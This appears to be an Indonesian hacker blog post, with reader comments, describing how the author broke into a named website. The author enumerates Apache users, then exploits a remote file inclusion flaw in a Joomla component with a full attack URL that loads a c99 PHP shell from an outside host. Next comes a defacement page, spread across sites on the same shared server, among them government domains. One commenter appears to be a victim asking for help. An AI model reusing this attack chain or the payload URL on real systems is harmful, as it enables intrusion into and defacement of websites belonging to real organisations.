User Enumeration merupakan kelemahan dari Apache yang memungkinkan kita untuk menjalankan user yang ada di server tersebut.
Cara menguji suatu server vulner terhadap user enumeration – > http://target.com/~root
jika pesan yang muncul “Forbidden” berarti server tersebut vulner.
Pada kasus ini ternyata site http://griyadesign.com/~root muncul pesan “Forbidden”

Saia coba cari Vulnerability RFI Joomla Component, eh nemu com_joomla-visites vuln, exploitnya bisa diliat di http://www.exploit-db.com/exploits/14476/
Ok langsung eksekusi php shellnya

http://griyadesign.com/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.site.com/c99.txt
Yeah, shell bisa dieksekusi, tinggal upload shell dan jgn lupa halaman php atau html kalian, terserah dah ^^
http://griyadesign.com/default.php


Sekarang coba kita cari site mana aja yang satu server sama http://griyadesign.com
klo saia pake :
http://www.yougetsignal.com/tools/web-sites-on-web-server/

Ternyata ada puluhan domain disana :) )

tadi user http://griyadesign.com pada server adalah griyades
/home/griyades/public_html/


Setelah upload halaman php atau html, sekarang kita coba di beberapa site yang satu server dengan http://griyadesign.com
ini hasilnya :
http://15menit.net/~griyades/default.php
http://www.siakkab.go.id/~griyades/default.php
http://www.iii.ac.id/~griyades/default.php
http://takalarkab.go.id/~griyades/default.php
dll :D



5 comments:

Anonymous said...

mas ni sya binun dengan mslh shell
kita buat shell ini tuk pa ?
trus c99.txt itu isinya pa ?
kita upload shellnya itu apa hrs pkei domain sendiri ato domain yg sama dengan situs tsb ?
untuk mengetahui user dr suatu situ sprti cntoh tcb crane gmn ?

vYc0d said...

^
coba ente cari di google dulu deh
bru klo dah mentok balik kemari

saidiblogger said...

gan, web ane kayaknya jadi salah satu korban agan nih.. cara ngebalikinnya gmana yah?? please...

vYc0d said...

^saidiblogger
Web yg mana ya bro?

aDji said...

mantapss jaya mas..vycod ... salam muslim haxorr :)